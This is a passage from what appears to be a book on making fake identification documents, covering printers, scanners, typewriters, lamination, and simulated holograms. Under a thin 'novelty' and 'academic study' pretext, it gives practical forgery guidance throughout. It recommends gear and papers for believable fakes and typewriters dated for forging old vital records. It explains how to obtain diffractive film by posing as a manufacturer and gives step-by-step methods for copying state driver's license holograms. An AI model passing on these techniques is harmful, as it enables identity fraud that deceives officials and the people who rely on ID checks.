into your shopping cart before checkout: +• Vphoto print film, item #105829 +• Photographic-quality paper, item #105824 (4 x 6) or #105822 (8 1/2 x 11) +• Photographic-quality labels, item #105848 (3 x 2) +I must warn you up front that the paper is not cheap. At this writing, 20 sheets of photographic +paper costs about $13 at buy.com. Vphoto print film sells at about $6 for 20 sheets. Fortunately, you +only need the paper for your final drafts. I do my regular drafts with HammerMill Laser Print Radiant +White (basis 24/60) paper, UPC #010199004604. Visit the Web site atwww.hammermillpapers.com for +more information. Most common laser printer papers should work fine with the Alps. +When I get close to a finished draft, I use the Alps Vphoto primer cartridge, which comes with the +printer and allows you to use regular laser printer paper in Vphoto mode. To reduce expensive mis- +takes, I insert Vphoto print film or photographic paper only when I'm all done tweaking the template. +16 + +TOOLS AND MATERIALS OF THE BACK-ALLEY ID MAN +Here she comes, Miss Ameri. . . Ahem. Yes, I still overreact when it comes to this impeccably engineered beauty, the Alps MD- +5000 printer. Get one while they last. +You can also save money by printing several ID templates on one sheet. I wait until I have several final +drafts ready, and then I insert them as picture objects into a word processor and print them all onto +one 8 1/2 x 11 sheet of photo paper. But I'm getting ahead of myself. You're probably not going to +purchase a damn thing until I share with you the virtues of this printer. So here goes. +Alps has developed and patented a completely different way of desktop printing, which is called +the Micro Dry, or MD, method. As its name implies, the ink goes on the paper dry. This prevents +unwanted absorption of ink by the paper, which is a common problem with inkjet printers. Because of +the ink absorption phenomenon, an inkjet printer dot grows a fuzzy sort of halo around it immediate- +ly after it is printed, and this severely affects the overall quality of inkjet printouts. +The MD process dot has no halo around it. Alps takes full advantage of this fact by giving its print- +ers the ability to print dots of varying sizes. With the ink absorption problem out of the way, it is much +easier for the printer to control the dot size. This allows the Alps to print in finer detail, especially at +curves, corners, and edges. +A 2,400-dpi image printed on Vphoto print film rivals 35mm color prints. In fact, if you can get +2,400-dpi templates, you may wish to forgo purchasing the dye-sublimation upgrade kit. But as men- +tioned earlier, true 2,400-dpi images are hard to find and even harder to work with. That's why I'm +also a fan of Alps' dye-sublimation upgrade kit. +F*A@#A#*@#*ck!!! (Alps Update) +During the later stages of writing this book, a reader brought to my attention a very disturbing +update regarding Alps Electric Co., Ltd. Without any warning or given reason, Alps decided to stop +17 + +SECRETS OF A BACK-ALLEY ID MAN +Here are some Alps printer accessories that you'll need to get the job done. +manufacturing its line of MD printers. I contacted a service rep from buyalps.com who explained that +the MD technology had been sold to another company, but even the rep did not know what the other +company was. It is unclear at this time whether MD technology will be available in the future. +At the time of this update, there were several Alps printers for sale on eBay, but I was unable to +find any store that stocks them. The new Alps 5000s on eBay were bid up as high as $795 due to the +shortage, but I think they are worth even that inflated price. +Okay, So What's the Deal with Dye-Sub? +Dye-sublimation is a thermal process where ink is embedded into the matrix of a special paper. A +medium-resolution image, say 280 dpi, will look like a photograph when printed with this unique pro- +cess. ID thugs like dye-sublimation because it produces very realistic IDs even when the original tem- +plate is not of the highest possible resolution. +Color Scanner +Although it's true that scanners are dropping in price, I'm not so sure the inexpensive ones are +exactly high resolution. Most "discount" models that claim to be 600 dpi, really have 300-dpi scanning +elements. So how do retailers get away with advertising these imposters as 600 dpi? As always, a cau- +tious consumer must read the fine print. Chances are, upon closer inspection of the box, you'll discov- +er embedded among the eye-reddening fine print a new term, interpolation. +Interpolation means that the 300-dpi scanning element uses software or firmware to guess what +the other 300 pixels might be. This is no different than attempting to change a 300-dpi image into a +18 + +TOOLS AND MATERIALS OF THE BACK-ALLEY ID MAN +600-dpi image by saving it as a different size file in a graphics program such as Adobe PhotoShop. This +trick may indeed produce 600 dpi, but the "resolution" is still 300 dpi. +So you should always check the specs when shopping for a scanner. To compare apples to apples, +you will need to know the resolution of the scanning element, not the interpolated dpi. The resolu- +tion is shown as optical resolution on the box. If the box says 1,200 x 600 dpi but does not specify optical +resolution, be wary. +At the same time, do not run away just because a box uses the word interpolation. It is quite possible +that a scanner will have 600 x 1,200-dpi optical resolution and 4,800 x 9,600-interpolated dpi. That's +fine. The interpolation routine can be thought of as an extra in this case. +There are plenty of good scanners out there, and they all pretty much work on the same principle. +Therefore, I see no need to recommend a specific unit for this book. In fact, if you own a digital cam- +era, you can get through many of the experiments in this book without a scanner (see under +"Olympus D-340R Digital Camera" on page 15). +Word Processor +I put this under "First the Big Stuff because good word processing software can cost you a hand- +some nickel. If at all possible, purchase or otherwise obtain Office 97 Pro. Office 2000 is of course +available if you prefer and if it will run on your machine. Either package contains Microsoft Word, +which I am using right now as I type. Many swindlers use MS Word to make employment and student +ID templates. These bad guys also use Word to make ID backs, rather than counting on the fuzzy or +nonexistent scans found (or not found) on the Internet. Although PhotoShop's "Type" feature makes +nice ID backs, the resulting file uses much more memory than a Word file does. +If you're lucky, your computer came loaded with Word as many do nowadays. If you're not lucky +and can't otherwise obtain this software, don't sweat it too much. Your computer probably has a stock +word processor that will help you produce ID templates and backs. These lesser quality word proces- +sors are harder to use, and you probably won't be able to make watermarks and other fun stuff, but it +will get you started in the art. +TOOLS FROM THE OLD SCHOOL +Those of you who know me, either personally or through my books, are aware that I'm a big fan of +old-fashioned methods and "poor man's" techniques for doingjust about anything. Even if you're tied +by an umbilical cord to your PC, you might still want to explore some of the more old-fashioned meth- +ods I'll be presenting. If nothing else, you will gain a greater appreciation for modern tools and how +much time they can save. If you're like me, you'll see where the latest gadgets have limitations and +you'll develop an affinity for some of the old standbys. +Photography +I've had a lifelong love of photography and the arts in general. So making IDs with a single lens +reflex (SLR) camera was not so foreign to me when I first began doing it. If you've never used any- +thing but an "instamatic" type of camera, the prospect of beginning a whole new hobby just to learn +how creeps make IDs may seem daunting. But you need not think of it that way. +There are really just a few aspects of photography that one must learn to make novelty IDs. So if +you're not interested in getting all wrapped up in a new hobby, you needn't be concerned. You can +buy some fairly inexpensive equipment to get the shots you'll need. But don't be surprised if you start +taking your camera along on vacations and day trips. The art of photography can be quite absorbing. +You can spend under $100 for used photography equipment to make IDs. At this writing, eBay has +Sears KS-1 SLR cameras listed for $15 to $35 and macro lenses for around $15. +19 + +SECRETS OF A BACK-ALLEY ID MAN +Those two items alone are enough photo equipment to make IDs. I suggest two more items: a Slik +tripod with quick-release mount (around $12 on eBay) and a mechanical shutter release cable +(between $5 and $10 on eBay). You may be able to find all of these items at a yard sale for much less. +Typewriter +In my book Identity, Privacy & Personal Freedom: Big Brother vs. The New Resistance, I included an +extensive list of typewriters, detailing the years during which each was in widespread use. This infor- +mation comes in very handy for anarchistic psychopaths who insist on forging old vital records just to +get an Irish passport.4 +Here's a short list of typewriters document forgers have been known to use: +• IBM Selectric, Selectric II—recent documents +• Remington Rem-ette—1938 +• Remington No. 17—1939 +• Corona—1912, produced until 1941; good for documents between 1912 and 1950 +• Underwood—1901 +For older records recalcitrant rogues must resort to pen and ink. An exceptionally stupid rogue +might try to forge old birth and marriage records with a ballpoint pen (which wasn't invented until +1938 and not in widespread use until the 1950s). I'm sure you can imagine what fresh hell such fool- +hardiness would wreak. +Poor Man's Lamination +Lamination pouches are not expensive, but laminators are. Some fledgling filchers simply use sev- +eral layers of peel-and-stick lamination sheets to give their IDs a thick, laminated feel. +Peel-and-stick lamination is actually the simplest form of cold lamination. Cold lamination is a sim- +ple way to avoid some of the detrimental effects of heat lamination discussed later. +STUFF YOU'LL NEED—OLD SCHOOL OR NEW +Whether you have all the latest gadgets or struggle with an old SLR camera, at some point you'll +have to put all the ID pieces/parts together. You'll need to perform hands-on trimming, tweaking, glu- +ing, and TLC. ID forgers need stencil knives, glue sticks, holographic film, tape, bond paper, corner- +rounders (or just nail clippers and a credit card), transparencies, lamination pouches, rulers, and a lot +of patience. +NOTES +1. These dpi statements are especially true for inkjet and laser printers, which I suspect most readers will be using. The +Alps printer, which I discuss later, works wonders with images under 300 dpi when printing in dye-sublimation +mode. +2. In practice, at the time of this writing, this seldom occurs. These numbers are given for demonstration. In truth, a +1,200-dpi scan from the Internet is quite common and usually sufficient to produce a believable fake. A 2,400-dpi +scan in PhotoShop format would be a very big file—on the order of 5 megabytes or more, which is difficult to work +with unless you own a very fast computer with lots of memory. +3. A top-ranking Internet auction service, eBay (www.ebay.com) is a great place to learn the true market value of +almost any item in any condition. +4. Sheldon X. Charrett, Identity, Privacy, and Personal Freedom: Big Brother vs. The New Resistance (Boulder, CO: Paladin +Press, 1999). For the typewriter list, see Chapter 3 of that text. For information on becoming an Irish citizen, see +Chapter 5 of that text. +20 + +Section Two +DOCUMENT SECURITY + +Chapter 3 +Getting a Grip on +Lamination +Hot lamination, cold lamination, 5 mil, 10 mil, polypropylene, vinyl chloride microlamination, +poor man's lamination, and, finally, where do I get the stuff? While researching this book, I perused +many Internet discussion boards and saw there were still quite a few people confused by lamination. +As an ID professional, I'd conquered lamination long ago and had forgotten the days when it really +had me buggered. +Lamination was one of the earliest document security devices. For a long time, laminators were +available only to municipalities and large corporations, so as a security device they weren't half bad in +their day. Even today people have trouble finding lamination pouches and laminators. Indeed, these +topics comprise a large majority of the questions I encounter on the Web, and some of the discussion +board answers are equally as telling. Respondents often suggest that the inquirer invent a company let- +terhead to facilitate buying lamination pouches from outfits that supply them. This demonstrates the +strong air of authority still surrounding lamination today. Fortunately, lamination supplies are not +nearly as difficult to get as people still seem to think. I'll list some sources at the end of this chapter. +If obtaining lamination supplies is not the problem, then what is? Actually, the modern document +forger faces a few. There is the Shakespearean question of double-laminating, to do or not to do? +There are blurring and fading issues when laminating over papers specially treated for certain desktop +publishing processes. There is the problem of how lamination will affect the quality of a hologram. +There are probably more problems (aren't there always?), but these are the ones that most affect doc- +ument forgers and as such are the only ones discussed in this chapter. +23 + +SECRETS OF A BACK-ALLEY ID MAN +Various lamination pouches (from left to right): military card, luggage tag, business card, driver's license, and credit card. +First the basics. There are three words: +• lamination +• laminate (pronounced "lam in 8") +• lamina +These three words are constantly misused; at least as far as I can see on Internet discussion boards. +To be sure that there's no confusion in this chapter, I'll define them here. Lamination refers to the pro- +cess of enveloping something in plastic. Laminate is a verb; it is the act of encasing something in plastic. +Lamina is the plastic sheet that covers something. The last word is where the trouble starts. Nobody +uses it—at least not on the Internet. Rather they say laminate'with an "it" sound (lam in it), or worse, +laminant, which isn't a word. To prevent confusion, I'll use lamination pouch whenever I am referring to +one. I'll use lamina when referring to a single layer of the pouch, especially after it has passed through +the laminator. +Lamination pouches come in various sizes and thicknesses. They are usually rectangular, but the +length of the rectangle varies depending on the pouch's intended use. Some intended uses are mili- +tary, business, and credit cards; luggage tags; and driver's licenses. The military card and luggage tag +pouches are larger than the credit card, business card, and driver's license pouches. The business card +pouches are longer than the driver's license and credit card pouches. +A long driver's license, such as the New Jersey one we'll be building later, is actually best fitted into +a business card pouch. A small driver's license is best fitted into a credit card pouch. Large driver's +24 + +GETTING A GRIP ON LAMINATION +Lamination pouches come in 50- to 100-count boxes. They are available through USI, laminationstation.com and office supply +stores. +licenses fit nicely into the driver's license pouch, as do birth certificate abstracts, which we'll also be +building later. +Luggage tag and military card pouches are good to have on hand. Either can be used to make an +employment badge, student parking permit, etc. The 5-mil version makes a good first layer when dou- +ble-laminating. Once the first layer's done you can trim it to size with a paper cutter before applying +the second layer. +Lamination pouches are available in 5-mil and 10-mil thicknesses. Mil does, not mean millimeter, +nor does it mean millionths of an inch. Mil is from the Latin milk, meaning one thousand. It is where +we get the word millennium, meaning 1,000 years; as well as millisecond, meaning one-thousandth of a +second. It is also the root of the real estate term "mill rate," which is how much tax per thousand dol- +lars of property value you send to your town hall every year if you own a home. Use these facts to +remember that mil means one-thousandth of an inch. A 10-mil pouch is ten-thousandths (or one-hun- +dredth) of an inch thick. +Five-mil pouches are good for the "no edge" style of laminated card, such as the early- to mid- +1990s South Carolina driver's license, and the mid- to late-1990s Wyoming driver's license. They are +also good when double-laminating, otherwise the finished ID is too thick. +DOUBLE-LAMINATING: TO DO OR NOT TO DO? +Document forgers consider many factors when deciding whether to double-laminate. Some forg- +ers double-laminate solely because an ID printed to thin paper seems too thin if only single-laminated. +25 + +SECRETS OF A BACK-ALLEY ID MAN +In a pinch, the poor man can use Super Clear cellophane tape as lamination. This tape also comes in handy when cold lamina- +tion is preferred, such as over diffractive holograms. +Some forgers like to apply a hologram or repetitive lettering pattern over a 5-mil laminated ID card +and then relaminate with another 5-mil pouch to protect the hologram. The two principal disadvan- +tages to double-laminating are (1) sometimes the ID comes out too thick, and (2) sometimes air pock- +ets are introduced between the lamination layers. +It's up to you whether to double-laminate, and your decision will likely vary with the ID. As long as +you know the pros and cons, you can make an educated decision. +HOW LAMINATION AFFECTS A HOLOGRAM +Lamination does not appear to have a detrimental effect on metallic-style holograms or repetitive +lettering. However, there are a handful of eventualities one must consider when working with rainbow +holograms. These will be discussed in the next section. +POOR MAN'S LAMINATION +If you can't afford a laminator, you can still make an academic study of modern document forgery. +For a buck or two, many office superstores will laminate something for you. More often that not, there +is an apathetic teenager who handles this end of the business, and he probably won't even notice or +care what you're up to. +If you can afford (or otherwise obtain) lamination pouches, a heavy-bottomed skillet, clothes iron, +and paper napkin can act as your laminator. Turn the iron on to its highest setting and rest it on an +26 + +GETTING A GRIP ON LAMINATION +A clothes iron, an upside-down saucepan, and napkin make a very effective laminator for the poor man. +upside-down skillet. You can also use an upside-down frying pan, saucepan, or anything that conducts +and holds heat. After 5 minutes, the skillet should feel hot to the touch, even a few inches away from +where the iron is resting. Your ID, back, hologram, whatever, should already be neatly arranged in a +lamination pouch. Fold a paper napkin around the lamination pouch just like you're making a god- +damn taco. Place the "taco" on the heated pan and press the iron on top of it. Rub the iron back and +forth over the pouch for 5 to 10 seconds; then check the results. If you have to reapply the iron, first +flip the ID so as not to overheat one side and then reapply for only a few seconds this time. I've found +that reapplication is seldom necessary. +This method works so well that I've been tempted to put my laminator up for bid on eBay. In some +ways, I prefer this method to using a laminator because you have more control over the finished prod- +uct, and the end result is just as good as any laminator does. So, if you don't yet own a laminator, feel +free to save yourself a hundred bucks by using this method. +If you're worried about heat lamination ruining your diffractive hologram (discussed in greater +detail in the next section), you can use several layers of peel-and-stick lamination sheets or Super +Clear tape. +A Word about Blurring +Laminating directly over a printed template may cause the finished ID to become blurred over +time. I show an example of this effect on page 28. +The examples were printed on Alps photographic paper using the dye-sublimation process. It does +not take very long for the blurring effect to show itself. Sometimes it appears within hours and only +27 + +SECRETS OF A BACK-ALLEY ID MAN +/f 's somewftaf dfficu/f to see m f/?/s fa/ac^ and white photo, but if you look closely around the pseudo-typeface "Xavier Sabine +Charrett" you will note a dark hob around the letters. The effect is severe and unacceptable. The color photograph on my Web +site shows the effect in its full ignominy. +gets worse over time. In this case, Alps ink (actually a dye) sublimating back into the vinyl chloride +coating of the lamination pouch caused the blurring. +A similar effect can occur when laminating directly over specially coated inkjet photo papers. The +vinyl chloride in the lamination pouch interacts with the photo paper's substrate, which is a form of +plastic. As the substrate deteriorates, the ink no longer has a dependable matrix onto which it can +adhere. The ink spreads out and looks blurry. +No matter the cause, a blurred ID is a dead giveaway that it's a fake. So what do licentious +larcenists do when they find themselves in this untenable situation? They redo the ID, placing a barri- +er between the photo paper and the lamination pouch. This, of course, opens a new can of worms +because if you choose the wrong material, you will have air bubbles instead of fuzzy ink. A transparen- +cy sheet can sometimes do the trick, but occasionally an air bubble or two will form. A better bet is the +HG-107 holographic film discussed later, which can serve two purposes if you also happen to need a +hologram. Efficient. +AND FINALLY, WHERE DO I GET THE STUFF? +Here are two good sources for laminators and lamination supplies: +USI, Inc. +33 Business Park Drive, Suite 5 +Branford, CT 06405-2944 +28 + +GETTING A GRIP ON LAMINATION +Lamination Station +837 Miramar Street +Cape Coral, FL 33904 +E-mail: Sales@lammationstation.com +Web: www.laminationstation.com +That's the lowdown on lamination. I've provided enough information to get you through the aca- +demic studies in this book. On some IDs, the last step before lamination is to insert your hologram. +The next chapter discusses holograms in detail. +29 + +Chapter 4 +Holograms +The term hologram is used to describe various optical effects, including those used in document +security devices. In actuality, a hologram is a laser-generated recording of an object onto a holograph- +ic film. Unlike standard photography, a holograph stores the interference pattern of light waves +reflected off an object. A standard photograph only records the color and intensity of light. +If this sounds complex, it is. If it sounds like more than you want to get involved with, don't worry. +We are not going to get into making actual holograms—that would require between $3,000 and +$30,000 worth of equipment. Rather, we are going to explore how recalcitrant reprobates create holo- +graphic effects on their fake IDs. In fact, some ID cards, including state driver's licenses, employ tech- +niques very similar to those we'll be exploring. For our purposes, we will refer to these simulated holo- +graphic effects as holograms. +PIONEERING RESEARCH +The hologram most people write me about is the rainbow hologram. A rainbow hologram is the +kind that's invisible when viewed at some angles and greenish or multicolored at other angles. Some +methods of dealing with these holograms were presented in my last book.11 have this thing about +rehashing: it's boring to write, and readers find it annoying to spend $35 on a book they've already +read. So I'm not going to review those techniques in this text. Instead, I present some completely new +techniques pioneered by myself and a few close members of my discussion board.21 especially want to +thank Bill P., whose inspiration kept me from settling for second-rate holograms. He openly and +31 + +SECRETS OF A BACK-ALLEY ID MAN +Various diffractive films. Because this is a black and white photo, it's hard to see the diffraction. The variegated areas on the +curved sheet are actually beautiful rainbows. +generously shared his thorough and meticulous research and is largely responsible, in one way or +another, for the material that follows. +DIFFRACTIVE FILM +To create a rainbow hologram you need a sheet of transparent film, such as extruded polyester, +that has been treated on one side with a diffractive grating. A detailed study of diffractive gratings is +hard physical science and well beyond the scope of this text. This discussion will be limited only to +what you need to know to make a rainbow hologram on a novelty ID. If you are interested in the sci- +ence of holograms and document security in general, I recommend Optical Document Security, pub- +lished by Artech House Publishing and edited by Rudolf L. van Renesse. +There are a few things you need to know about diffractive film. A brief education will help you +avoid costly mistakes and unnecessary repetition when incorporating "holos" into your novelty IDs. +You'll also learn how low-caste crudballs use this same information to ensure that bureaucrats accept +their IDs as genuine. Diffractive film holograms are not ideal in all lighting conditions, and crafty +crooks know how to present them. +First, you must understand that there are different kinds of diffractive films. Illustration 1 (see +page 36) shows a surface refe/'diffractive grating, which means the grating is etched onto the surface of +the film. There are other microstructures, known as buried microstructures, where the diffractive grating +is beneath the surface of the film. Those won't be discussed here. +You'll note that only one side of the film has the diffractive grating. It is the uniform spacing +32 + +HOLOGRAMS +between the grates that caus- +es light to be refracted into +all the colors of the rainbow. +In fact, it is the same type of +uniform alignment of water +molecules in the atmosphere +that causes real rainbows. For +our discussion, you don't +need to know why this hap- +pens. Just be aware that light +is diffracted because of the +gratings and that the gratings +are only on one side of the +film. Later on, it will be very +important to keep track of +which side has the gratings. +So How Do I Get +the Stuff? +You can't just walk into a +store and say, "Hey, can I get +a sheet of transparent +extruded polyester that has +been treated on one side +with a diffractive grating?" +The clerk will call the men +in white coats on you. Nor +can you approach a manu- +facturer of such industrial- +grade material and ask for +$2 worth. The manufacturer +will inform you that the +minimum order it accepts is +20,000 square feet. +Diffractive film is usually +sold in bulk to other manu- +facturers who use it to make +fancy packaging for their +products. In recent years, +you've probably seen diffrac- +You can make a testpiate to test the iridescence of a given film under varying cir- tive film on toothpaste +cumstances. The top testpiate tests HG-107 over aluminum foil. Gold Metallic +boxes and magazine covers, +(Alps) ink, iridescent tinting medium, and Interference Gold acrylic paint. I tested +among other places. +the film against the tinting medium and Interference Gold in thin and heavy appli- +cations. The plate is laminated with the HG-107 right side up on the left and upside So the only way to get the +down on the right. The testpiate also tests iridescence against five colors along the stuff is to be a manufacturer +bottom (brown, tan, blue, green, red). The bottom testpiate tests the effects of considering the use of diffrac- +adding a "buffer layer" of HG-107 to protect the gratings from vinyl chloride in the +tive film in your packaging . . . +lamination pouch. +or to say that you are. Call, +33 + +SECRETS OF A BACK-ALLEY ID MAN +TABLE 1: RESULTS OF HG-107 EXPERIMENT +HG-107 TEST PLATE HG-107 TEST PLATE +SINGLE LAYER OF DIFFRACTIVE FILM TWO LAYERS OF DIFFRACTIVE FILM TO TEST BUFFER EFFECT +RIGHT SIDE UP UPSIDE DOWN RIGHT SIDE UP UPSIDE DOWN +RIGHT-SIDE- UPSIDE-DOWN +(No SECOND LAYER) RIGHT-SIDE-UP BUFFER UPSIDE-DOWN BUFFER +UP BUFFER BUFFER +Effect completely Effect present but Effect present and somewhat better Air bubbles formed Buffer somewhat superfluous +destroyed due to diminished over over dark colors. Hypotheses: (1) a in between gratings because HG-107 was already +vinyl chloride dark colors buffer layer will protect the HG-107 in the HG-107 protected by being upside +clogging the (brown, tan, blue, gratings, (2) buffered gratings are better layers because there down. Produced about equal +grating. green, red). than upside-down gratings possibly was no "escape results. Buffer layer may help +because (a) the active gratings do not route." An HG-107 protect active layer from heat +react with the template, (b) the active buffer layer should lamination. +layer has added protection from heat be placed right side +lamination via the buffer layer. up. +Notes: In all cases where the effect was present, the foil produced the strongest rainbow due to its high reflectivity. The Interference Gold +produced the second strongest rainbow, but since the foil is less practical, the Interference Gold is the real winner. The iridescent tinting +medium showed promise and may be valuable in future experiments. It should be noted that the white background in itself provided suffi- +cient reflectivity to produce the effect. The solid colors are definitely a problem, and the ID forger will have to watch his backgrounds. +Interestingly enough, however, shiny black lines produced high reflectivity in separate experiments. +write, or e-mail a company that makes holographic packaging material and ask for samples. I'm not +going to publish a list of companies here for these reasons: +• If all my readers go to the same company, the company will get suspicious and begin investigat- +ing inquiries before sending samples. +• Future industrial supply startups will be eager to grow their business by handing out samples. +These are the companies you should seek out, but I have no way of knowing now which ones +they'll be. +That said, I'm going to show you a product that meets our needs—but only to a certain extent. It +will be good enough to demonstrate the process, but not so good that everybody will run to this manu- +facturer and spoil the source. If you're truly interested in seeing the effect in all its glory, then you'll +have to seek out a film with a higher diffractive index in the zero order (hint, hint, hint). Okay? +HG-107 Has Merit +HG-107 is a film I experimented with that produced wonderful effects in direct light but failed to +meet the mark in diffuse light (such as the ambient light of an overcast day). This is because its grat- +ing microstructure has a "first-order" readout (not as good as "zero order" hint, hint. (See Chapter 12 +of Optical Document Security, cited on page 32.) Nonetheless, a document forger can use HG-107 or +equivalent in certain situations. +I Have Diffractive Film—Now What? +Diffractive film won't itself produce a hologram. It needs a reflective material underneath it to +send light back to the viewer's eye. In many cases, the reflective material can simply be the ID tem- +plate itself. Or it can be something like Interference Gold acrylic paint. If the paint is applied in the +34 + +HOLOGRAMS +shape of a state's hologram . . . well. . . then +things start to get interesting. +Reread the above paragraph a couple of +times. It is the crux of this entire section. +PUTTING IT ALL TOGETHER IN AN ID +Because the diffractive grating produces the +holographic effect, you must be careful not to +destroy it when constructing the novelty ID. +This may sound obvious, but the grating is very +delicate and there are many things that can +affect it during the construction process. The +grating's biggest enemy is heat lamination. The +vinyl chloride in the lamination pouch can clog +the grating and destroy the holographic effect +(see Table 1 on previous page). The heat of the +laminator is also a problem because it can melt +the polyester and distort the grating. Even a +slightly distorted grating will affect the overall +holographic effect. Any melting at all will +Though not discussed further in this text, the iridescent tint- +change the size, shape, and uniformity of the +ing medium showed promise as a reflective substance. +grating microstructure, all of which affect its +ability to diffract light. +You can protect the grating from becoming clogged with vinyl chloride by adding another layer of +film over it, a buffer layer. If another layer of diffractive film is used, the gratings of both layers should +be facing up. (Refer to Illustration 1, page 36.) +The illustration shows five layers. The bottom layer is the ID card itself. The next "layer" up is +the reflective material, such as Interference Gold paint. In reality, this won't be much of a layer, +but it is shown as one for clarity. Over that is the first layer of diffractive film with the gratings fac- +ing up. I'll call this the "active" layer since it is the one that produces the holographic effect. A sec- +ond layer of film is placed over the active layer to protect the grating from the vinyl chloride in the +lamination pouch and direct heat of the laminator. In reality, the film in this layer need not con- +tain diffractive gratings. But since you already have the product on hand, you might as well use it. I +like using it anyway because the gratings (which should be facing up) give the vinyl chloride some- +where to go during lamination. In fact, in my HG-107 experiment I proved that this arrangement +produces the fewest air bubbles. If you were to place the top (or "passive") layer of film upside +down over the active layer, air would be trapped between the gratings as well as just underneath +the lamina. The vinyl chloride in the lamination pouch should be absorbed by a porous substrate, +such as paper. Therefore, using a surface relief diffractive film over the first layer proves to be an +effective solution all around.3 +CAVEATS +Reproducing holograms with diffractive film carries a general caveat because diffractive film is +really not a hologram. Using a first-order film such as HG-107 carries additional caveats. As previously +mentioned, first-order grating microstructures need a direct light source to produce a hologram. This +means your novelty ID will have little or no hologram if presented outdoors on an overcast day. +35 + +SECRETS OF A BACK-ALLEY ID MAN +Illustration 1 shows the various layers of a diffractive film hologram ID. It shows a second layer of film to protect the first and a +reflective layer beneath the first layer of film. It is possible to have only one layer of film, an "active" layer, upside down and +cold-laminated (or very carefully heat-laminated). Also, the reflective layer need not be a separate metallized layer. A glossy +template may have sufficient reflectivity without metallization. +The opposite is also true. Certain direct lighting conditions will cause the ID to show a hologram +where you don't want one. If the ID card has an area that is highly reflective, such as shiny black letter- +ing, small, unwanted holograms can pop up in direct light. For this reason, you must take care when +designing the card so that no highly reflective areas exist except where you want them. Or you can use +the following technique for placing a design directly onto diffractive film. +PLACING A DESIGN ON DIFFRACTIVE FILM +You can eliminate unwanted holograms by purposely clogging the diffractive grating where holo- +grams are not needed. You do this by coating the active layer of diffractive film with clear gloss artist's fin- +ishing spray or equivalent. You can carry this concept one step further to place a complete design direct- +ly onto the film. Again, special thanks to Bill P. for the following procedure. You will need the following: +• Diffractive film (embossed side identified) +• Latex paste or latex masking fluid +• Clear gloss artist's finishing spray +• Stencil of design +Except for the diffractive film, you should be able to get everything you need from a good art sup- +plies source. You will have to engage in some trial and error to find the right sort of finishing spray. +Read the ingredients and avoid anything containing acetone or other organic solvents. Acetone reacts +with most plastics and will turn the film white. I've used Grumbacher "advanced formula" damar var- +nish "gloss" (catalog #645), which worked well.4 A decent masking fluid is Grumbacher Mskit™ Liquid +Frisket. I purchased both Grumbacher products at Ben Franklin Crafts. +36 + +HOLOGRAMS +Paladin horsehead logo cut from low-tack tape placed on license-size piece of HG-107 diffractive film. The right side of the film +has been dogged with damar varnish as described in this section. You can see the difference between the right (clogged) and +left (undogged) sides. To drive home this point, I sprayed a cotton swab with the varnish and wrote "TEST" on the otherwise +undogged left half of the film. +Procedure +This procedure will work on any surface relief diffractive grating film. Depending on how fancy +you want to get, the stencil can be cut at home from card, Mylar, Dura-Lar, or frisk film, or cut by a +laser cutting service from Mylar, vinyl, or metal. Unless you get involved with a laser cutting service, +the following procedure is more "old school" than you might expect, considering that we're replicat- +ing a hologram. +1. Place stencil over embossed side of diffractive film.5 Fasten securely, ensuring that there are no +gaps between the stencil and the film, and sandwich them tightly. This is where vinyl, Mylar, +Dura-Lar, and metal are better than card. +2. If using latex paste, then apply carefully over exposed areas of stencil with a small spatula. If +using liquid latex, use a brush. I think applying the liquid latex with a brush is more controlled. +3. Allow this to dry. When dry, latex forms a thin and flexible rubber that you will later be able to +peel off. +4. Carefully remove the stencil. Use a scalpel or hobby knife, if necessary. You should have a +latex-covered version of the design. +5. In a well-ventilated area, lay the film flat and apply finishing spray. You can spray the film +directly or spray the corner of a very clean, lint-free cloth and rub the finish into the film. If +rubbing, be careful not to rub off the latex mask during this step. You are trying to clog the +grating. The amount of finishing spray required will vary depending on the type of film and +the spray itself. Experiment to find the technique that suits you best. +6. Allow finishing spray to dry. +7. Use adhesive tape or a soft rubber eraser to begin peeling the latex. Use your fingers or a pair +of tweezers to peel the remainder. +37 + +SECRETS OF A BACK-ALLEY ID MAN +After the film was completely clogged, I allowed the varnish to dry and then peeled back the low-tack tape. Use the tip of your +stencil knife to lift a corner of the tape (or frisk film) to start the peel. The Paladin horsehead hologram was now ready to be +used in an ID. +Here it is shown over a darker background. It's a little blurry 'cause the FBI was knocking at my door and my hand was shaking. +Why is it refracting light with no reflective surface behind it? This is an inherent property of the HG- 7 07. A reflective surface is +needed only when there is a surface, such as when the hob is placed over an ID card. +38 + +HOLOGRAMS +Here is the horsehead hologram facedown on a Massachusetts license template. The damar varnish doubles as a glue, helping the +diffractive film adhere to the ID template. This also protects the active surface (gratings) from lint, hairs, fingerprints, etc. The +exposed (nongrating) side is smooth, so any fingerprints left during construction can be easily wiped away with a lint-free cloth. +Some materials used to place a design on diffractive film. +39 + +SECRETS OF A BACK-ALLEY ID MAN +8. You should now have a diffractive hologram seemingly embedded inside a piece of clear plas- +tic. When done right, it looks quite impressive. +Alternative Technique +Liquid latex can be a real pain to work with. If you lack artistic skill or patience, you can use this +alternate technique. Instead of steps 2, 3, and 4 substitute the following: +Cut a "positive" design (as opposed to a stencil) of your hologram into frisk film, such as the type +shown in the photo shown on page 37. Apply the positive design to the diffractive film before clogging +the gratings. Once the gratings are sufficiently clogged and the finishing spray is dry, carefully peel the +design from the diffractive film. This also yields impressive results. (See the preceding photo series.) +Thermal Scribing +The foregoing methods for placing a design on diffractive film work quite nicely if the design is +not too complex. But what about more intricate designs, such as the California or Massachusetts holo- +gram? Hiring a laser cutting service to make a stencil for one ID is not very cost-effective. What's a +nefarious necromancer to do? Well, if you don't mind playing Russian roulette with your Alps print +head, you can print a negative of any image you'd like directly onto the embossed side of any surface +relief diffractive film. +By printing the negative image in dye-sublimation mode, you are actually using the heat of the +print head to melt unwanted areas of the grating microstructure. When done, only the areas you want +to diffract will remain. It doesn't matter how intricate the design is; it's just like printing a graphic. +So what's the problem? Well, there's a good chance you'll damage your print head and an even +better chance you'll damage the ink cartridge ribbon. In fact, I would say damage is likely unless you +"print" to the film one pass at a time, allowing the print head to cool in between each pass. You would +need several files, each a different "row" of the image, and it would probably be best to "print" in the +lightest shade of yellow so that no actual ink makes it to the film. +I will not provide step-by-step instructions because I don't think you should attempt this method. I +tried it with my Alps, and the yellow ribbon fused to the HG-107 on the second pass. My heart sank, and I +promised God that if the print head was undamaged I would be a good boy for the rest of my life. Lucky +for me, the print head was not damaged. Keeping my promise to God, I did not attempt this again. +I share this information with you only because there are other types of thermal printers in the +world that will fare much better with this method. Buy cheap ones in the government surplus mar- +ket and experiment. Share your results with others on my Web site so they'll know exactly how +moronic marauders (of whom we are making an academic study) do this sort of thing and to steer +clear of such anarchy. +METALLIZATION +Using the above techniques, you may be quite 